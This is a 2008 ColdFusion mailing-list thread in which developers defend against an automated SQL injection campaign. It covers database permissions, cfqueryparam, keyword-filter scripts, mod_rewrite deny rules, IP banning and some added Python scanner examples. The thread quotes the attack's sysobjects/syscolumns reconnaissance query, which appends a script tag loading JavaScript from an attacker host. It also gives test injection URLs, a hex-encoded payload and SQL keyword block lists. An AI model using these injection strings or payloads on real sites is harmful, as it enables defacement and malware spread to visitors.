HELP! SQL Injection Attack!
Author: Jaime Metcher
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310783
If you block APNIC's range you're blocking the whole of the Asia/Pacific
region. APNIC is not an ISP or large company, it's actually the regional
authority for internet addresses, so it owns *all* addresses in Asia/Pacific
- just like ARIN owns all addresses in North America and RIPE owns all
addresses in Europe.
Your lookup is resolving back to APNIC because you're using your regional
authority (in your case ARIN) and it will only resolve addresses in its own
range. For all other addresses it will just refer you to the appropriate
regional authority. If you then use *that* authority's whois, you'll get
the real story.
Oh, and if you try to automate this to look up lots of addresses, you're
breaking the terms of use of the whois server. I'd imagine they'd block
you, but I've never tried it.
Jaime
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310686
> Just curious as I have now seen this on an old ASP site months ago and
> now on CF. Every IP lookup I do goes back to
If it's just a blind SQL injection attempt, the actual sending of the attack
could be from a spoofed IP.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310585
>> RewriteRule .*@.* /security-violation.htm [NC]
>
> Won't that match email address ?
Yup. Don't think I use those in the URL or path for anything tho.
Modifying those rules is pretty straightforward; we'll see how
things go, I reckon.
--
Beware the barrenness of a busy life.
Socrates
Author: Brian Peddle
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310557
Just curious as I have now seen this on an old ASP site months ago and
now on CF. Every IP lookup I do goes back to
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC <http://ws.arin.net/whois/?queryinput=O%20%21%20APNIC>
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
For ASP I ended up blocking full ranges of ips which helped the issue quicker.
Paul Ihrig wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Paul Ihrig
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310538
what are you seeing if you limit email to unique IP's?
ours is way down if we do that.
we are just sending unique ip's to one of our GREAT it guys to insert
into ban list in firewall.
should figure out how to auto add remove ip's
----- Excess quoted text cut - see Original Post for more -----
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310518
> http://www.actcfug.com/files/_SQLPrev.zip
After putting this on a number of sites in just the last two hours, I am
completely blown away by the number of attacks I'm seeing! Over 2500 in
less than 2 hours on just 3 sites.
My poor mail server can't take all the extra incoming mail!!! I'm going
to have to mod the code to remove the warning email that goes out, and
have it create a log file or something instead!
I have to think to myself - is this payback for baiting all those
Nigerian scammers last week? Oh jezz....
This is unbelievable!
Les
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310513
> I have to agree with Dave. Every possible client scope needs to be checked -
> and the form scope seems rudimentary to me. Not checking the form scope is
> like setting up a firewall and locking down everything except a few dozen
> ports near the bottom of the stack (after all ... we rarely get attacked
> from ports 10 through 30 :)
I agree you should do input validation on the form scope, but not with
my script. The logic behind it looks for a semi-colon and any SQL
keyword within the same form field. The likelihood that a comments
field or other form field will meet the criteria is too high to use a
blanket keyword scanner like this. I agree that you should validate any
data you're passing to queries, regardless of the variable scope, but
some methods are great for some scopes and not others given the
methodology. The script can be easily modified to check the form scope
as well, but you may see false positives if you do that.
-Justin Scott
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310507
> http://www.gravityfree.com/_sqlprev.cfm.txt
Just want to thank Justin for this script -- and everybody else who
has contributed some very useful information to this
discussion. It's been very helpful.
I cfincluded this script on application.cfm in just three directories
-- and over night, I got 2,600 emails regarding injection attempts.
It's going to be a while before I get cfqueryparam on all my queries,
so I have to do everything I can to stop this stuff at the top
level. It was a relief to see my MS SQL database still clean this
morning, after all that hammering.
So -- what I am wondering is -- there is going to be the next wave of
attack that's going to try something else -- very likely form-based
submissions....
I can get captcha working -- CF8 does that very nicely -- but I am
wondering if something like this initial script can be modified to
scope it for forms.
Maybe take something like that same script, and do something like
<CFIF IsDefined("form.variablename")>protection clause here</CFIF>
for every element in the script ???
Thanks for your patience with these kinda low-level questions. I
been programming in CF since 2.0 -- and I still have code out there
with "ParameterExists" in it -- but this is a one-man self-taught
deal here, and not too sophisticated.
How can we get form protection linked to application.cfm....?
- Bruce
At 06:51 AM 8/8/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310503
>> 100 IPs is hardly any RAM. I'd use 10k entries, just as a starting number and
>> scale down if it really becomes an issue.
Another approach would be to store also the date the IP was entered in
the list, and remove it after a certain number of days.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310499
Justin,
I have to agree with Dave. Every possible client scope needs to be checked -
and the form scope seems rudimentary to me. Not checking the form scope is
like setting up a firewall and locking down everything except a few dozen
ports near the bottom of the stack (after all ... we rarely get attacked
from ports 10 through 30 :)
-Mark
>> Since nearly all SQL injection attempts come through the URL
>> (including the recent ones), that is where I put the focus.
> Nearly all automated SQL injection attempts come through the URL. The ones
> that, say, compromise people's credit card data, they typically come from
> forms.
>> With this script I would not recommend checking the form scope as
>> there is too high a risk of false positives. I've never heard of an
>> injection attack coming through CGI variables. I suppose it's
>> possible, but the percentage of queries using CGI scope data is
>> probably minuscule compared to URL variables.
> Again, targeted attacks will attempt to use any data that comes from the
> client. A brief review of the available tools for pen testing will show you
> that.
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> Fig Leaf Software provides the highest caliber vendor-authorized instruction
> at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
> Northern Virginia, or on-site at your location.
> Visit http://training.figleaf.com/ for more information!
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310495
All our AOL users (a substantial amount) come through on a single
proxy ip address. We set up ip blacklisting and almost instantly we
had blocked all our aol users (we quickly took down the black
listing).
Something to consider.
Dominic
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310492
Just to make sure the finger points in the right place - the minor
mis-spelling that Peter talks about was in a change that I made to
Justin's file so it would work ok on our system. We require mail
server, username and password in any cfmail tag, so i added them and
made a dyslexic typing error.
But anyway the script works a treat when you don't have my misspelling
in it, and in the last 2 hours it's identified more than 1400 hack
attempts.
And yes, Peter, you always need to use CFQUERYPARAM in any queries, if
they're processing any user input. There has been some blogging on
this subject in the last few weeks, with a couple of really good tools
released that will identify queries in your apps that are exposing
risk in this regard.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
----- Excess quoted text cut - see Original Post for more -----
Author: Peter Tilbrook
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310490
Wondering if SQL in form fields is also a risk. At any rate Justin D. Scott of
GravityFree (jscott@gravityfree.com) released a handy script which you can grab
here:
http://www.actcfug.com/files/_SQLPrev.zip
The original script had a minor mis-spelling bug and I made the keywords
alphabetical in order to make tweaking it easier if you need not use all the
provided keywords (eg: DROP).
My host Mike Kear (mkear@afpwebworks.com) provided this documentation:
THE EXPLOIT:
The attempt is to use url variables to gain access to the MASTER database (they
can't!) or identify VARCHAR, NVARCHAR or CHAR fields in your tables, then add
their own content to them. The attackers use automated bots to make multiple
attempts on multiple pages. If the attack is successful, at best it changes all
the text fields in a database, at worst, it destroys your database.
THE DEFENCE
There are a number of ways to defend against an attack like this, and we’re doing
all of them.
[A] Deny read or write permissions to the MASTER database and the system tables
to the SQLServer Login that ColdFusion uses to access the datasource. This has
always been the case
[B] Restrict the SQLServer Login that ColdFusion uses to read/write access to
only the database that it needs for that datasource. This has always been the
case, but we’re double checking. This means that if the hackers gain access,
the damage will be contained to one database only, and a weak defence on one site
won’t compromise everyone else.
[C] prevent the attack reaching the database in the first place. This is where
you come in.
Attached is a script (_SQLPrev.cfm ) written by Justin Scott of GravityFree
(jscott@gravityfree.com). It seeks to scan the URL being called, looking for
some specific strings that can be used in this kind of attack. If it finds such
a word, it aborts the page call and sends the user to the home page of the site,
and sends you an email.
I STRONGLY SUGGEST you incorporate this script at the top of your application.cfm
(or if you are using application.cfc, at the start of your onRequestStart()
method). IF the page call is not an attack, the page will be slowed by a
millisecond or two. If it IS an attack, it will very likely capture it and
prevent it.
Just to help you focus your attention on this and how real the threat is, while
I have been typing this email, 11 sites I am currently watching have received 638
attack attempts, detected and deflected by this script.
HOW TO DEPLOY THE SCRIPT:
[A] alter the cfqueryparam variables at the top of the script to email addresses,
passwords, etc that are appropriate to you.
[B] put the script somewhere on your site
[C] in your application.cfm site include the script ( or in application.cfc
include the script in the onRequestStart() method)
[D] to test the script, go to http://domain.com/index.cfm?id=4;DECLARE() which should trigger the
script, and you'll get an email advising you of a hack attempt.
Thanks to both Mike Kear and Justin Scott for making it a bit easier to discern
if our sites are being attacked. Obviously good coding is preferred and touch
wood I am immune so far but will do a full code review to make that gospel!
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310476
> RewriteRule .*@.* /security-violation.htm [NC]
Won't that match email address ?
--
Tom Chiverton
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310475
> Exactly, if you are managing a popular enough site, it could happen. At
> least once or twice in a blue moon.
Likewise, you have plenty of other users, losing one isn't a big deal.
--
Tom Chiverton
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310474
> It's just plain annoying. What's the point of the attacks? What
> does the attacker get out of it?
Cash.
It's either gaming search results in Google or pushing malware.
--
Tom Chiverton
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310473
> based on the idea that
> the bot is probably operating from an innocent infected PC and will
> not be a threat for months,
Oh, it will. Windows users who are infected are probably very unlikely to ever
be cleaned.
> about 100 or so sounds reasonable.
100 IPs is hardly any RAM. I'd use 10k entries, just as a starting number and
scale down if it really becomes an issue.
--
Tom Chiverton
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310472
It's a pity there isn't a way to stop these hackers coming to the site
in the first place. I put Justin's script on some of my sites this
afternoon and my mail box is filling up, drawing my attention to how
many of these bloody attempts there are. Up to now, I've just had it
happening automatically (instead of sending me an email, it was
logging into a database table) and I'd go looking at the table once in
a while to see how it was doing.
It's just plain annoying. What's the point of the attacks? What
does the attacker get out of it? Is it just for the 'attaboy!' when
they get through and wreck a site for as long as it takes to pull the
backup online? Or is there some more malicious reason for doing it?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Author: Rizal Firmansyah
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310468
Yup,
that's correct Justin. Just a warning sign though :)
I switched my hosting back in 2003, because even though the system
gave me my own SQL user/pass,
it actually could see and query other DBs on the same machine (wrong privs).
My current hosting also allows users to query 3-4 other DBs, but I
think those DBs are sample templates (Northwind etc) - well, hopefully :D
My sites are so far so good. Those SQL I got from the webserver log.
I put my own cf_trimvars tag in Application.cfm to translate all
passed parameters.
It makes sure all inputs are safe and won't be executed as commands in
SQL server.
Rizal
ColdFusion Custom Tags And More
www.masrizal.com
At 08:54 8/8/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Jeffrey Lemire
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310467
We also have been seeing this attack as well. Most of the SQL statement is in a
hexadecimal format so it seems that using "keyword" filters could potentially be
rendered innocuous (assuming the entire statement is all in hexadecimal).
Why would ColdFusion or MSSQL accept SQL statements formatted as hexadecimal? Is
there a setting/feature to prevent this?
For those that are using IIS v6 & 7, URLScan v3.0 (beta) has been designed to
help with SQL injection attacks as "part" of a comprehensive plan to combat this
"nuisance". The IIS solution would stop the attacks at the IIS level as a 1st or
second line of defense. Something then could be put in place (application.cfc) at
the ColdFusion application level.
http://blogs.technet.com/swi/archive/2008/06/24/new-tools-to-block-and-eradicate-sql-injection.aspx
http://blogs.iis.net/wadeh/archive/2008/06/24/urlscan-v3-0-beta-release.aspx
http://www.microsoft.com/downloads/details.aspx?FamilyId=EE41818F-3363-4E24-9940-321603531989&displaylang=en
BTW: If anyone has a way to determine/catch hexadecimal formatted content through
the URL scope, it would be greatly appreciated!
I would also like to thank everyone for their contributions. The combined
knowledge of everyone has given me greater insight on combating these attacks :-]
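The two detection questions raised in this thread (Justin's rule of "a SQL keyword and a semicolon in the same URL variable", and Jeffrey's worry that a statement delivered entirely as a hex literal slips past a keyword filter) can be checked together in one small scanner. The code below is an added example written for this page, not Justin's _SQLPrev.cfm and not anything from GravityFree; the keyword list, the function names and the sample URLs are my own constructions. It decodes every 0x... literal in a value (CAST(0x.. AS NVARCHAR) payloads are UTF-16LE, so both that and a single-byte decoding are tried) and then applies the semicolon-plus-keyword rule to the raw value and its decodings.

```python
import re
from urllib.parse import unquote_plus

# Tokens that, together with a semicolon in the same value, mark the attack the
# thread describes (constructed list; extend it as the script's keyword list does).
SQL_KEYWORDS = ("declare", "cast(", "exec(", "exec ", "select ", "insert ", "update ",
                "delete ", "drop ", "nvarchar", "varchar", "sysobjects", "syscolumns",
                "xp_", "sp_password")
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")


def parse_query(query):
    """Split on '&' only, so a ';' inside a value stays part of that value
    (some query parsers also treat ';' as a separator and would hide it)."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def decode_hex_literals(value):
    """Return readable decodings of every 0x... literal in value. A CAST to
    NVARCHAR carries UTF-16LE text; a CAST to VARCHAR carries single-byte text."""
    decoded = []
    for match in HEX_LITERAL.finditer(value):
        raw = bytes.fromhex(match.group(1))
        for codec in ("utf-16-le", "latin-1"):
            try:
                text = raw.decode(codec)
            except UnicodeDecodeError:  # odd byte count cannot be UTF-16
                continue
            if text and all(c.isprintable() for c in text):
                decoded.append(text)
    return decoded


def suspicious_fields(url):
    """Map each query parameter to a reason when it satisfies the thread's rule:
    a SQL keyword and a semicolon in the same value, hex literals decoded first."""
    findings = {}
    for name, value in parse_query(url.partition("?")[2]):
        texts = [value] + decode_hex_literals(value)
        joined = "\n".join(texts).lower()
        keyword = next((k for k in SQL_KEYWORDS if k in joined), None)
        if keyword and ";" in joined:
            where = "" if keyword in value.lower() else " (inside a hex literal)"
            findings[name] = f"keyword {keyword.strip()!r}{where} with ';'"
    return findings


# Constructed sample requests: the thread's own test URL, a benign search field
# that contains a keyword but no semicolon, a statement delivered only as a hex
# literal, and an e-mail address (which this rule, unlike a bare '@' rule, ignores).
SAMPLE_URLS = {
    "test_from_thread": "/product.cfm?id=4;declare()",
    "benign_keyword": "/search.cfm?q=declare+of+independence&page=2",
    "hex_encoded": "/index.cfm?id=1;0x" + "select name from sysobjects".encode("utf-16-le").hex(),
    "email_in_query": "/contact.cfm?to=bob%40example.com",
}


def scan_samples():
    """Run the scanner over the constructed samples; only two of them should hit."""
    return {label: suspicious_fields(url) for label, url in SAMPLE_URLS.items()}
```

The benign sample shows why Justin declined to apply this rule to the form scope: a keyword alone is not a signal, and a comments field that happens to contain both a keyword and a semicolon would still be flagged, which is the false-positive risk he describes.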
Author: Justin D. Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310466
> Now this is real bad for shared hosting customers.
> Cause even if we protect our sites, that SQL simply
> queries all tables in the SQL server. So, if you
> found your data compromise, the leak may have been
> caused by other sites that are using the same SQL
> machine, duh!
On SQL Server the sysobjects and syscolumns tables are per-database, so any
script that queries those will only see the tables and such for the database
it's running inside of. This particular attack will stay within the
database being queried and not go outside, so if your site is hit with this
attack it's a sure sign that there is a problem in your code somewhere that
let it in.
Given that, I have seen SQL injection attacks that will go try to query the
'master' database on SQL Server, look at the sysdatabases table, and then go
crawl through every database it can get access to (and if it can get to
master, it's a good bet it can get to everything else). Those are the
really nasty ones.
If the hosting company is at all competent, they will have a unique username
and password for each client database (or each client shared among your
databases) which can't access other client databases. Not only does it help
contain SQL injection attacks, it keeps other hosting clients out of your
databases (and you out of theirs).
-Justin Scott
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310463
I guess I should add that it checks both the file path/URL, and the
query-string, for malicious whatnots.
The file path/URL is probably only needed if you're already using
rewrites. Otherwise you only need the ones with QUERY_STRING,
probably.
Also, I've commented out the "http:" rule, which you can use if people
are submitting those crappy spam URLs to you. I commented it out in
case folks actually pass URLs via URL, although I doubt many do (if
it's even legit for the RFC, which I doubt).
Yeah, that's it, I reckon.
--
By all means, marry. If you get a good wife, you'll become happy; if
you get a bad one, you'll become a philosopher.
Socrates
On Thu, Aug 7, 2008 at 6:38 PM, denstar wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310462
I've cobbled together some stuff for apache that helps a good bit:
Using mod_rewrite, you can at least prevent stuff from getting to CF.
It still hits the webserver, but hey, better there than all the way to
your appserver!
Here's a modded version of some rewrites I found for IIS (MS people
can find it on google, I didn't save the link, sorry!):
# Path checks: a RewriteRule pattern is matched against the URL path, not the
# query string. [NC] makes the match case-insensitive.
RewriteRule .*NVARCHAR.* /security-violation.htm [NC]
RewriteRule .*DECLARE.* /security-violation.htm [NC]
#RewriteRule .*INSERT.* /security-violation.htm [NC]
RewriteRule .*xp_.* /security-violation.htm [NC]
# Also matches any e-mail address that appears in a path.
RewriteRule .*@.* /security-violation.htm [NC]
#RewriteRule .*';* /security-violation.htm [NC]
RewriteRule .*EXEC\(@.* /security-violation.htm [NC]
RewriteRule .*sp_password.* /security-violation.htm [NC]
#RewriteRule /security-violation.htm /security-violation.cfm [L]
# Query-string checks. A RewriteCond only guards the single RewriteRule that
# follows it, so the rule under the commented-out "http:" condition must be
# commented out as well; left active it would rewrite every request.
#RewriteCond %{QUERY_STRING} .*http:\/\/.* [NC]
#RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*sp_password.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*CAST\(.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*EXEC\(@.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .* /security-violation.htm
# Hand the rewritten request to the CF page for logging/auditing.
RewriteRule /security-violation.htm /security-violation.cfm [P,L]
It basically re-directs all them to a CF file called
/security-violation.cfm, for tracking/auditing whatnots, if you so
choose.
You can also change the last line to this:
RewriteRule /security-violation.htm /security-violation.cfm [F]
or something similar (that was off the cuff) to have it respond with
"forbidden" instead.
You can slap that all in one file (security.rewrites.conf or
something) and then Include it in you virtual hosts, or wherever.
The strings are just perl-flavored regular expressions, it's easy to
add/remove stuff if it's too hard or too loose.
Dunno if it will help others, but it's sure helped us out, so here it is.
HIH!
--
By all means, marry. If you get a good wife, you'll become happy; if
you get a bad one, you'll become a philosopher.
Socrates
On Thu, Aug 7, 2008 at 7:56 AM, Kris Jones wrote:
----- Excess quoted text cut - see Original Post for more -----
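Tom's question about whether the `.*@.*` rule matches e-mail addresses is easiest to answer by replaying the rule set against a few requests. The following is an added example, not part of denstar's post: it transcribes the active patterns into Python regexes (an assumption I make is that the patterns behave the same under `re` as under Apache's PCRE for these simple cases) and applies them the way Apache does, path rules against the decoded URL path and `%{QUERY_STRING}` conditions against the raw query string. The sample request URIs are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed transcription of the active rules in denstar's post. Apache matches
# a RewriteRule pattern against the (decoded) URL path only; the RewriteCond
# %{QUERY_STRING} lines are the only ones that see the query string, and they
# see it raw, before any %xx decoding.
PATH_RULES = [r"NVARCHAR", r"DECLARE", r"xp_", r"@", r"EXEC\(@", r"sp_password"]
QUERY_RULES = [r"sp_password", r"CAST\(", r"EXEC\(@", r"DECLARE"]

# Tightened variant: drop the bare '@' path rule that Tom pointed out matches any
# e-mail address; EXEC\(@ still covers the shape the '@' rule was aimed at.
TIGHT_PATH_RULES = [p for p in PATH_RULES if p != r"@"]


def matching_rules(request_uri, path_rules=PATH_RULES, query_rules=QUERY_RULES):
    """Return (scope, pattern) pairs that would send the request to
    /security-violation.htm; [NC] in the original is re.IGNORECASE here."""
    parts = urlsplit(request_uri)
    path = unquote(parts.path)
    hits = [("path", p) for p in path_rules if re.search(p, path, re.IGNORECASE)]
    hits += [("query", p) for p in query_rules if re.search(p, parts.query, re.IGNORECASE)]
    return hits


# Constructed requests: the thread's test URL and two legitimate URLs that carry
# an e-mail address, one in the path and one in the query string.
SAMPLE_REQUESTS = {
    "thread_test": "/index.cfm?id=4;DECLARE()",
    "email_in_path": "/users/bob@example.com/profile.cfm",
    "email_in_query": "/contact.cfm?to=bob@example.com",
}


def evaluate(path_rules=PATH_RULES):
    """Apply one path-rule set plus the query rules to every sample request."""
    return {label: matching_rules(uri, path_rules=path_rules)
            for label, uri in SAMPLE_REQUESTS.items()}
```

Replaying shows the split denstar describes: the DECLARE in the thread's test URL is caught by the query-string condition and not by the path rule, an e-mail address in the query string is never touched by the `@` path rule, and an e-mail address in the path is blocked by it until that rule is dropped.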
Author: Rizal Firmansyah
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310461
I tried to decipher the SQL injection which has hit my websites thousands of
times this week.
I found this particular code (it's attacking MS SQL):
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id
and a.xtype='u' and (b.xtype=... or b.xtype=... or b.xtype=... or b.xtype=...)
The remaining code appends script src="http://jjmaoduo.3322.org/csrss/w.js
to every string column found in the whole SQL DB.
Now this is real bad for shared hosting customers.
Because even if we protect our sites, that SQL simply queries all
tables in the SQL server.
So, if you find your data compromised, the leak may have been caused
by other sites that are using the same SQL machine, duh!
Better alert your webhosting company too.
Rizal
ColdFusion Custom Tags And More
http://www.masrizal.com
At 06:37 AM 8/8/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: jscott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310460
By default it will redirect back to the root domain (/), but that can be modified
in the file or
easily changed to a CFABORT as well.
To trigger it for testing you'll need a SQL keyword and a semi-colon in the same
URL variable, for
example...
/product.cfm?id=4;declare()
...would trigger it.
-Justin Scott
------- Original Message -------
From : morchella[mailto:morchella.deliciosa@gmail.com]
Sent : 8/7/2008 6:39:26 PM
To : cf-talk@houseoffusion.com
Cc :
Subject : RE: Re: HELP! SQL Injection Attack!
does Justin's file redirect the intruder?
i tried passing
/products/index.cfm?n1Id=1&FOREIGN=test
but nothing happened
i am including the file in my application.cfm
modified the email & such..
how can i test it
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310459
I meant to say: Set the deny permission on the system table to the
user that you use to access the database from cf
At 07:27 PM 8/7/2008, you wrote:
>You should set the permissions on the system table so that you can
>not read or write to the system tables. There
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310458
>Your database contains all its object names in metadata tables, which can be
>queried directly.
It was mentioned last week, but just to re-iterate:
You should set the permissions on the system table so that you can
not read or write to the system tables. There is no need for it, and
by removing access, this particular attack will fail. They would
have to try guessing the table names by trial and error - or if you
help them by displaying the table names in the error message they can
find the tables quickly.
So in your error handling template, never mention the name of the tables.
I started logging and banning the IP addresses.. I logged 2500
IPs and 9027 hack attempts caught.. so each IP address tried an
average of 4 times. Apparently, a single IP address will only try
our site for less than a minute, then they are never seen again.. so
I now ban the most recent 100 IPs. When a new IP attacks, I add it to
the end of an application list..and remove the first item.
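Al's rolling list of the 100 most recent attacking IPs, Claude's suggestion earlier in the thread to store the date alongside each IP and drop it after some days, and Dominic's warning that a shared proxy address (his AOL users) must never be banned all fit in one small structure. The code below is an added example, not Al's application-scope list or anything from the thread's scripts; the class, its method names, the constructed log lines and the capacity and TTL values are my own choices for illustration.

```python
from collections import OrderedDict
from datetime import datetime


class RollingBanList:
    """Ban list combining two ideas from the thread: keep only the N most recent
    attacking IPs (Al Musella's 'last 100') and expire entries after ttl_seconds
    (Claude's 'store the date and remove it after some days'). Addresses in
    never_ban are shared egress points such as Dominic's AOL proxy, which must
    not be blocked no matter what arrives through them."""

    def __init__(self, max_entries=100, ttl_seconds=7 * 86400, never_ban=()):
        self.max_entries = max_entries
        self.ttl_seconds = ttl_seconds
        self.never_ban = frozenset(never_ban)
        self._last_seen = OrderedDict()  # ip -> epoch seconds, oldest first

    def record_attack(self, ip, now):
        """Add ip (or refresh it); returns False if it is on the never_ban list."""
        if ip in self.never_ban:
            return False
        self._last_seen.pop(ip, None)            # re-insert at the end: newest
        self._last_seen[ip] = now
        while len(self._last_seen) > self.max_entries:
            self._last_seen.popitem(last=False)  # drop the oldest, like Al's list
        return True

    def _expire(self, now):
        # Insertion order is time order as long as 'now' only moves forward,
        # so the scan can stop at the first entry that is still within the TTL.
        for ip, seen in list(self._last_seen.items()):
            if now - seen > self.ttl_seconds:
                del self._last_seen[ip]
            else:
                break

    def is_banned(self, ip, now):
        self._expire(now)
        return ip in self._last_seen

    def banned_ips(self, now):
        self._expire(now)
        return list(self._last_seen)


# Constructed log lines of the shape the thread's script could write instead of
# sending e-mail: ISO timestamp, client IP, offending request. 203.0.113.250
# plays the role of a shared proxy that legitimate users also come through.
SAMPLE_LOG = """\
2008-08-07T18:00:00 198.51.100.1 /index.cfm?id=4;DECLARE()
2008-08-07T18:00:20 198.51.100.2 /index.cfm?id=9;DECLARE()
2008-08-07T18:00:41 198.51.100.1 /news.cfm?id=12;DECLARE()
2008-08-07T18:01:05 203.0.113.250 /index.cfm?id=4;DECLARE()
2008-08-07T18:01:30 198.51.100.3 /index.cfm?id=2;DECLARE()
2008-08-07T18:02:00 198.51.100.4 /index.cfm?id=7;DECLARE()
"""


def replay_log(text, max_entries=3, ttl_seconds=2 * 86400, never_ban=("203.0.113.250",)):
    """Feed the log into a deliberately tiny list; returns (banlist, last_timestamp)."""
    banlist = RollingBanList(max_entries, ttl_seconds, never_ban)
    last = 0.0
    for line in text.splitlines():
        ts, ip, _request = line.split(" ", 2)
        last = datetime.fromisoformat(ts).timestamp()
        banlist.record_attack(ip, last)
    return banlist, last
```

With a capacity of three, the replay ends with 198.51.100.1, .3 and .4 banned: .2 was pushed out when .4 arrived, .1 survived because its second attempt moved it to the newest end, and the proxy address was never added. Two days later every entry has aged out, which is the behaviour Claude asked for and which keeps Tom's "10k entries" bound from filling with addresses of bots that only ever tried once.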
Author: morchella
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310455
does Justin's file redirect the intruder?
i tried passing
/products/index.cfm?n1Id=1&FOREIGN=test
but nothing happened
i am including the file in my application.cfm
modified the email & such..
how can i test it
Author: brad
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310456
<div id="Best Monk Theme song impression">
It's a jungle out there.
</div>
----- Excess quoted text cut - see Original Post for more -----
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310454
We run a very large linux website and have seen such SQL attacks for months now.
However, this recent wave has *really* picked up over the last 48 hours. It
began August 6, and we have logged close to 40,000 attack attempts and counting.
Our code is well protected, and this attack appears to target MSSQL, so we are
not too concerned about the injection. However, if this attack continues to
grow, it could quickly become a DOS situation. Blocking IP addresses is futile.
I count hundreds and hundreds of them originating the attack.
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310453
Just want to chime in on this -- I also stuck Justin's file online,
and in just a few minutes, I had two of these email warnings. Very
helpful for my naive non-parameterized pages. One thing I like about
the email is, it tells me my domain and page of the attack -- and
also the IP address where it came from-- something I just didn't know before.
Now, let's see, you are telling me I have to itemize every variable
in every query -- 180 database tables, 20-100 variables per table,
1000 queries per site, 20 sites, hmmm.....
You were saying something about automation, Brad....? Gotta look
into that.....
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310448
> Since nearly all SQL injection attempts come through the URL
> (including the recent ones), that is where I put the focus.
Nearly all automated SQL injection attempts come through the URL. The ones
